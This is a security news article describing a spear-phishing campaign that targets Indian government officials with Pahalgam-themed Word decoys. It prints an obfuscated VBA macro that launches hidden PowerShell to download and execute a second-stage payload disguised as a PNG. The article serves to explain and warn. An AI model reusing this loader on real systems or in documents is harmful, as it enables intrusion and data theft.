In a sophisticated cyber espionage campaign, threat actors are actively targeting Indian government personnel using decoy documents referencing the recent Pahalgam attack.

The malicious campaign, discovered in early May 2025, utilizes spear-phishing emails with attachments designed to exploit recipients’ interest in security developments related to the incident.

These emails appear to originate from legitimate government agencies, making them particularly convincing to unsuspecting officials seeking information about the security situation.

Initial analysis reveals that the attacks begin with Microsoft Word documents containing embedded macros that, when enabled, deploy a multi-stage malware payload.

The documents, disguised as official briefings or intelligence reports on the Pahalgam situation, prompt users to “Enable Content” to view supposedly protected information, triggering the execution of hidden malicious code.

The attackers have crafted their lures with considerable attention to detail, including authentic-looking letterheads and formatting consistent with official government communications.

Seqrite researchers identified the campaign after detecting unusual network traffic patterns from government networks.

Their investigation uncovered a previously undocumented Remote Access Trojan (RAT) that establishes persistence and communicates with command-and-control servers reportedly linked to a nation-state threat actor with a history of targeting Indian government institutions.

The researchers noted that this campaign appears to be the work of a highly sophisticated adversary with deep knowledge of Indian government operations.

The malware campaign appears specifically tailored to compromise sensitive government information, with particular focus on defense, intelligence, and law enforcement agencies.

Security experts assess the operation as highly targeted, suggesting a deliberate intelligence-gathering mission rather than opportunistic cybercrime.

The timing of the campaign, coinciding with the aftermath of the Pahalgam incident, indicates the attackers’ strategic approach to exploiting current events.

Infection Mechanism

The infection chain begins when victims open the malicious document, typically named “Pahalgam_Incident_Report_Confidential.docx”. When macros are enabled, the document executes obfuscated VBA code that decodes and executes a PowerShell command:-

Sub AutoOpen()
    Dim str As String
    str = "powershell.exe -nop -w hidden -e JGM9KChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTkyLjE2OC40NS4xMDUvYy5wbmcnKTtpZXggJGM="
    Shell str, vbHide
End Sub

This PowerShell command downloads and executes a second-stage payload disguised as a PNG image file, establishing persistence through scheduled tasks and Registry modifications.

The malware then collects system information and begins exfiltrating sensitive data while attempting to move laterally within government networks.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.